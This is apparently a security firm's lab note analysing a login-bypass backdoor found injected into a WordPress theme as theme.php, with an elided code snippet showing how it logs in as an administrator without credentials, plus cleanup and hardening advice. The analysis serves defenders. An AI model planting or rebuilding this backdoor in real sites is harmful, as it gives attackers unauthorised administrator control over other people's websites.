Malicious script injected to WordPress theme allowing Admin Login Bypass

Labs Note

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.

This technique, login bypass, is often used after the website is compromised because attackers can easily access the post, page, and widget section without spending hours trying different username & password combinations in a brute-force attack, for instance.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with good code and trying to go undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');$query_str = "SELECT ID FROM $wpdb->users";…if (user_can($user_id, 'administrator')) {   …    $user_login = $user_info->user_login;   …    do_action('wp_login', $user_login);       echo "You are logged in as $user_login";       if (function_exists('get_admin_url')) {           wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file that subsequently loads functions from wp-config.php related to login capabilities.

Secondly, the malware checks if the user_id fetched from the database has administrator privileges -the location of ‘wp-admin’ URL location via ‘get_admin_url()’ function. If all these criterias match, the attacker is then redirected (wp_redirect) to the wp-admin URL with administrator access to the backend without sending any username / password combination.

In these types of attacks, we also noticed that bogus admin users may be created into the backend interface. If you suspect of a compromise, or identify a user with administrator privileges that you haven’t created, we highly recommend taking a backup of your database, removing the user and changing the password for all other users.

As a good security practice, users should have access only to the resources they need to, as WordPress implemented this very well through the different roles a user could have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature and prevent further damage to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.

You May Also Like